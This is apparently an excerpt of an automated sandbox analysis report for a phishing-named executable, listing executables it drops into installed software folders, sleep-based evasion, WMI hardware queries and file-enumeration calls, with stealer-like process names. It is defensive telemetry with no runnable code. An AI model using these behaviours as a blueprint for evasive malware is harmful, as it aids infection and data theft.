Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\alg.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	API coverage: 3.3 %
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	API coverage: 3.3 %

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -599727s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -599503s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -599129s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598190s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597830s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597225s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -597044s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -596576s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99717s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99608s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99460s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98245s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -98124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97995s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97691s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97361s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96952s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96842s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96608s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96389s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96279s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -96060s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 1704	Thread sleep time: -95843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe TID: 6584	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7008	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7472	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 5800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 2896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep count: 8625 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 1042 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7748	Thread sleep time: -503160000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7748	Thread sleep time: -84240000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7608	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 8036	Thread sleep count: 486 > 30
Source: C:\Windows\System32\msdtc.exe TID: 8036	Thread sleep time: -48600s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7400	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00452126
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	2_2_0045C999
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00436ADE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00434BEE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	2_2_00436D2D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00442E1F
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0045DD7C FindFirstFileW,FindClose,	2_2_0045DD7C
